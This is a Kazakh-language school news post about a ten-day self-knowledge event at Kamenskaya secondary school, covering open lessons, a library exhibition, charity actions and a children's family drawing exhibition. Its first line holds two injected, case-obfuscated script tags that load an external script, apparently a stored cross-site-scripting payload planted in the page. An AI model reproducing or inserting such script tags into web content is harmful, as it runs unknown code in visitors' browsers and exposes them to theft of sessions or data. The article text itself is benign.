<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.02.2017

Онкүндік "Өзін-өзі тану: Махаббат және Шығармашылық педагогикасы"

 

2017 жылдың 2 ақпаннан 12 ақпанға дейін «Каменская орта мектебі» ММ-нде "Өзін-өзі тану: Махаббат және Шығармашылық педагогикасы" тақырыбымен  өзін-өзі тану бойынша онкүндік өтті.

Өзін-өзі тану апталығының  ашылуы   мектеп әкімшілігімен бірлесе өзін-өзі тану оқытушысы өткізген салтанатты жиын 2 ақпанында 

басталды.

Олар балаларды онкүндіктің іс-шаралар жоспарымен және С. А. Назарбаевтың өмірбаяны мен еңбектері  туралы бейнеролик көрсете отырып, өзін-өзі тану жобасының жасаушысымен  таныстырды.  

Апта ішінде  мектепте шығармашылық ашық сабақтар өтті: "Жақсы көру және достасуға үйренейік" - 2 сынып, "Денсаулық құпиялары" - 1, 3-сынып, " Патриот болу" - 4 сынып, "Біздің заманымыздың батыры" - 5,6 сынып, "Мейірімді жүрек" - шағын-орталық.

Мектеп кітапханасында балаларға С. А. Назарбаеваның   қызметі туралы материал берілген "Мейірім төгетін ана" атты  кітап көрмесі ұсынылды, "Өзін-өзі тану" жоба авторының жұмысы көрсетілді.

Балалар Сара Алпысовна туралы кітаптарды қызығушылықпен оқыды,  оның еңбектерімен танысты. Көрмені мектеп кітапханашысы Н.М. Нехайбо дайындады.

Оқу жылының ішінде жағымды атмосфераны құру мақсатында, сондай-ақ қоршаған ортаға әр түрлі нысандарда өзінің мейірімді қарым-қатынасын білдіруге мүмкіндік беруіне  "Өзін-өзі тану» онкүндік  уақытында: Махаббат пен Шығармашылық педагогикасы"  "Құстарға көмектес", "Таза мектеп – біздің жалпы мақтанышымыз", " Әлемді жақсарту үшін,  оқы"  атты бірқатар акциялар өткізілді.

Акцияларға тек балалар ғана емес, олардың ата-аналары және педагогтар қуана қатысты.

Әрбір қатысушы өзінің шығармашылығын және даралығын көрсетті

Онкүндіктің барлық қатысушылары бір-біріне жақсылық, бақыт, сәттілік, бейбітшілік және игілік тілектер тіледі.

Өзін-өзі тану" онкүндіктің соңғы аккорды   өз отбасы үшін мақатаныш, өз ата-анасына деген махаббат пен құрмет сезімін көрсете отырып, 

1-інші сыныптан - 11-інші сынып балалары қатысқан "Менің мейірімді отбасым" атты шығармашылық суреттер көрмесі болды.     

Өзін-өзі тану онкүндігі қоршаған әлемге және адамдарға деген сүйіспеншілік және құрмепен,  мейірімділік толқынында өтті.

Просмотров: 1266


Пікір қосу



Деректерді қолтаңбаға қосу